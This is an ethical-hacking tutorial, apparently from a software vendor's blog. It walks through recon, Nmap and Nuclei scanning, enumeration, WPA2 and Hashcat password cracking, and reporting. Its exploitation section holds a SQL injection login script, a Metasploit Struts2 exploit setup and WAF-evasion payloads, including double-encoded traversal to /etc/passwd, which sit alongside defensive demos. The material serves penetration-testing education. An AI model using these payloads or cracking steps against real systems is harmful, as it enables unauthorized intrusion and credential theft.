
Ethical Hacking Basics -- Recon, Scanning, Exploitation & Reporting

DodaTech Updated 2026-06-22 6 min read

Ethical hacking is the authorized simulation of cyberattacks to identify vulnerabilities before malicious actors exploit them -- following a structured methodology of reconnaissance, scanning, exploitation, and reporting.

What You'll Learn

You will learn the five phases of ethical hacking, use tools like Nmap and Metasploit for recon and exploitation, and write professional penetration test reports that drive remediation.

Why It Matters

The global cybersecurity workforce faces a 4 million person shortage. Organizations must find vulnerabilities proactively. Ethical hackers earn an average of $120,000 per year and perform critical work protecting infrastructure.

Real-World Use

A penetration tester for a healthcare provider discovers an unauthenticated SQL injection in the patient portal during the scanning phase. The report enables the engineering team to patch before an attacker finds and exploits it.

Phase 1: Reconnaissance

Reconnaissance gathers information about the target without direct interaction.

# Passive recon with Amass (-passive restricts it to third-party data sources, so nothing touches the target)
amass enum -passive -d example.com -o recon-results.txt

# Subdomain enumeration
sublist3r -d example.com -o subdomains.txt

# DNS enumeration: a zone transfer attempt, which does contact the target's name servers (active, not passive)
dnsrecon -d example.com -t axfr

Expected output: Lists of subdomains, IP addresses, mail servers, and name servers associated with the target domain.

Open Source Intelligence (OSINT) Tools

# Collect email addresses associated with a domain
theHarvester -d example.com -b google,linkedin,bing

# Discover subdomains and related certificates
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sort -u

# Check data breaches for company emails
h8mail -t company.com -bc /path/to/breach-compilation.txt

Expected output: Lists of email addresses, employee names, subdomains, and potentially breached credentials that inform the attack surface.

Phase 2: Scanning

Scanning identifies live hosts, open ports, and running services.

# TCP SYN scan of all ports with version and OS detection (raw packets, so it needs root)
nmap -sS -sV -O -p- --min-rate 5000 -oA nmap-full target.com

# Service and version detection
nmap -sV -p 80,443 --script=http-headers,http-title target.com

Expected output: A complete port inventory with service versions. Open ports 22 (SSH), 80 (HTTP), 443 (HTTPS), and 3306 (MySQL) would each indicate different attack surfaces.

# Nmap result example
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu
80/tcp   open  http       nginx 1.24.0
443/tcp  open  http       nginx 1.24.0
3306/tcp open  mysql      MySQL 8.0.35
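A port inventory is only useful once it is turned into findings. The following added example (not from the original post) parses the Nmap output above and flags open services that should normally not be reachable from an external scan position; the list of internal-only service names is an assumption for the demo, not an Nmap feature.

```python
import re

# Constructed Nmap normal-output lines, copied from the result example above.
NMAP_OUTPUT = """\
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu
80/tcp   open  http       nginx 1.24.0
443/tcp  open  http       nginx 1.24.0
3306/tcp open  mysql      MySQL 8.0.35
"""

# One port line: "<port>/<proto>  <state>  <service>  <version...>"
LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Assumed policy list: Nmap service names that rarely belong on an Internet-facing host.
INTERNAL_ONLY = {"mysql", "postgresql", "ms-sql-s", "redis", "mongod",
                 "microsoft-ds", "ms-wbt-server"}

def parse_nmap(text):
    """Turn Nmap's port table into a list of dicts; header and blank lines are skipped."""
    ports = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        ports.append({"port": int(port), "proto": proto, "state": state,
                      "service": service, "version": version.strip()})
    return ports

def flag_exposures(ports):
    """Return open ports whose service should normally stay internal."""
    return [p for p in ports if p["state"] == "open" and p["service"] in INTERNAL_ONLY]

if __name__ == "__main__":
    inventory = parse_nmap(NMAP_OUTPUT)
    for finding in flag_exposures(inventory):
        print(f"{finding['port']}/{finding['proto']} {finding['service']} "
              f"({finding['version']}) is reachable from the scan position")
```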

Vulnerability Scanning with Nuclei

# Run Nuclei (ProjectDiscovery) templates for known CVEs, misconfigurations, and exposures
nuclei -u https://target.com -t cves/ -t misconfiguration/ -t exposures/

# Scan for specific OWASP Top 10 categories
nuclei -u https://target.com -tags sqli,xss,idor,lfi -severity critical,high

# Export results for reporting
nuclei -u https://target.com -json -o nuclei-results.json

Expected output: Nuclei identifies CVEs matching the target technology stack, misconfigurations like exposed .git directories or default credentials, and information disclosure endpoints.

Phase 3: Enumeration

Enumeration extracts detailed information from discovered services.

# Web directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -o dirs.txt

# HTTP header inspection
curl -sI https://target.com | grep -i '\(server\|x-powered-by\|x-frame-options\)'

Expected output: Directory listings, admin panels, backup files, and server header information revealing the technology stack.

Wireless Security Assessment

Testing wireless networks requires specialized tools and techniques.

# Enable monitor mode on wireless interface
airmon-ng start wlan0

# Capture beacon frames, probe requests, and the WPA2 handshake, writing to capture-01.cap
airodump-ng -c <channel> --bssid <bssid> -w capture wlan0mon

# Crack WPA2 handshake (ethical testing only)
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <bssid> capture-01.cap

Expected behavior: The wireless adapter switches to monitor mode and captures nearby access points and clients. A WPA2 handshake is captured between a client and access point, then cracked offline.

Phase 4: Exploitation

Exploitation attempts to demonstrate impact using discovered vulnerabilities.

# Basic SQL injection test
import requests

# Classic tautology payload; passed via params so the quote and spaces are percent-encoded
payload = "' OR '1'='1"
url = "https://target.com/login"
response = requests.get(url, params={"username": "admin", "password": payload}, timeout=10)

# Crude indicator: a success page instead of a login error suggests the query was altered
if "Welcome" in response.text:
    print("SQL injection likely successful")

Expected behavior: If the application returns a success page instead of an error, the login form is vulnerable to SQL injection.
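The following added example (not from the original post) shows why the test above works and what the Phase 5 recommendation "parameterize all queries" fixes: the same login check implemented with string splicing and with placeholders, run against a constructed in-memory SQLite table. Plaintext passwords and the table layout are assumptions to keep the demo short.

```python
import sqlite3

# Constructed in-memory users table standing in for the portal's database.
# Plaintext storage is only for brevity; a real system stores password hashes.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")

PAYLOAD = "' OR '1'='1"   # the tautology payload used in the test above

def login_vulnerable(username, password):
    """Vulnerable form: user input is spliced into the SQL text, so the
    payload turns the WHERE clause into ... AND password = '' OR '1'='1'."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None

def login_parameterized(username, password):
    """Hardened form: placeholders keep the input as data; the payload is
    compared literally against the stored password and simply fails."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None

if __name__ == "__main__":
    print("vulnerable login with payload:   ", login_vulnerable("admin", PAYLOAD))
    print("parameterized login with payload:", login_parameterized("admin", PAYLOAD))
```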

# Metasploit basic usage
msfconsole
search cve:2026 type:exploit
use exploit/multi/http/struts2_content_type
set RHOSTS target.com
set RPORT 8080
check

Expected output: Metasploit confirms the target is vulnerable and provides a check result of "The target appears to be vulnerable."

Web Application Firewall Evasion

Test how WAFs handle common evasion techniques during penetration tests.

# SQL injection with comment obfuscation
curl "https://target.com/search?q=admin'/**/OR/**/1=1--"

# XSS with mixed-case tag names (defeats case-sensitive signature matching)
curl "https://target.com/search?q=<sCrIpt>alert(1)</sCrIpT>"

# Path traversal with double encoding
curl "https://target.com/download?file=%252e%252e%252fetc%252fpasswd"

Expected behavior: A well-configured WAF blocks these obfuscated payloads. A misconfigured WAF passes them through, revealing the application is vulnerable despite having a web application firewall.
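The reason a misconfigured WAF passes these payloads is usually that it matches signatures against the request as received rather than against a canonical form. The following added example (not from the original post, and not any real WAF's rule set) shows three deliberately naive rules missing the payloads above, and the same rules catching them once the input is URL-decoded until stable, stripped of inline SQL comments, and lowercased.

```python
import re
from urllib.parse import unquote

# Constructed query-string values, copied from the three requests above.
SAMPLES = {
    "sqli": "admin'/**/OR/**/1=1--",
    "xss": "<sCrIpt>alert(1)</sCrIpT>",
    "traversal": "%252e%252e%252fetc%252fpasswd",
}

# Deliberately naive signatures, written against the canonical (lowercase) form.
RULES = {
    "sqli": re.compile(r"' or 1=1"),
    "xss": re.compile(r"<script>"),
    "traversal": re.compile(r"\.\./"),
}

def normalize(value, max_rounds=3):
    """Canonicalize before matching: URL-decode until stable (defeats double
    encoding), drop inline SQL comments (/**/), collapse whitespace, lowercase."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value)
    value = re.sub(r"\s+", " ", value)
    return value.lower()

def raw_match(kind, value):
    """What a rule sees when applied to the request exactly as received."""
    return bool(RULES[kind].search(value))

def normalized_match(kind, value):
    """The same rule applied after canonicalization."""
    return bool(RULES[kind].search(normalize(value)))

if __name__ == "__main__":
    for kind, value in SAMPLES.items():
        print(f"{kind:10} raw={raw_match(kind, value)!s:5} "
              f"normalized={normalized_match(kind, value)}")
```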

Password Cracking with Hashcat

When you extract password hashes, Hashcat cracks them using GPU acceleration.

# Identify hash type
hashid -m '$2y$12$T8w2S0YKG0RFF8VxjKFHPO'

# Crack bcrypt hashes with a wordlist, then display the recovered hash:password pairs
# (--show only prints previously cracked entries from the potfile; it does not crack)
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 3200 hashes.txt --show

# Mask attack for passwords of up to 8 characters (?a matches any printable ASCII character)
hashcat -m 1000 ntlm-hashes.txt -a 3 ?a?a?a?a?a?a?a?a --increment

Expected output: Recovered plaintext passwords are displayed with the hash type and cracking speed. Bcrypt (mode 3200) cracks at approximately 200 hashes per second on a consumer GPU, while NTLM (mode 1000) cracks at 20 billion hashes per second.

Phase 5: Reporting

Every finding requires clear, actionable documentation.

Severity  Finding                          CVSS  Recommendation
Critical  SQL injection on login endpoint  9.8   Parameterize all queries
High      SSL certificate expired          7.5   Renew and automate renewal
Medium    Missing CSP headers              5.0   Add Content-Security-Policy
Low       Server header discloses version  2.5   Hide server version string

Common Errors

  1. Scanning without authorization -- Running Nmap against a target without written permission is illegal in most jurisdictions. Always obtain a signed scope-of-work document first.

  2. Relying solely on automated tools -- Tools miss business logic flaws like IDOR, race conditions, and privilege escalation. Manual testing is essential.

  3. Skipping the enumeration phase -- Moving directly from scanning to exploitation misses critical context. Enumerate every service -- directory listings, API endpoints, and version-specific CVEs.

  4. Destructive testing in production -- SQL injection can delete tables, and buffer overflows can crash services. Test in staging environments or use safe payloads.

  5. Poor report writing -- Technical findings without business impact or remediation steps get ignored. Write for both the CISO (executive summary) and the developer (technical details).

Practice Questions

  1. What is the difference between active and passive reconnaissance? Passive recon uses public sources like DNS records, search engines, and social media without touching the target. Active recon involves direct interaction like scanning and probing.

  2. Why use a SYN scan (-sS) instead of a full connect scan? SYN scan sends only the first packet of the TCP handshake and never completes it, making it faster and less likely to be logged by applications that log full connections.

  3. What does CVSS score 9.8 indicate? A CVSS of 9.8 is Critical severity -- typically a remotely exploitable vulnerability with no authentication required and high impact on confidentiality, integrity, and availability.

  4. How do you verify a SQL injection is not a false positive? Confirm by extracting actual database information (version, user, database name) through the injection, or by observing different response times in time-based injections.

  5. Challenge: Set up a vulnerable VM (DVWA or Metasploitable), perform a full penetration test through all five phases, and write a professional report with at least five findings including CVSS scores and remediation steps.

Mini Project

Conduct a penetration test against a deliberately vulnerable target like HackTheBox or TryHackMe. Document every step from reconnaissance through exploitation. Write a five-page report with an executive summary, technical findings, CVSS scores, and prioritized remediation recommendations.

Built by the developers of Doda Browser, DodaZIP, and Durga Antivirus Pro.
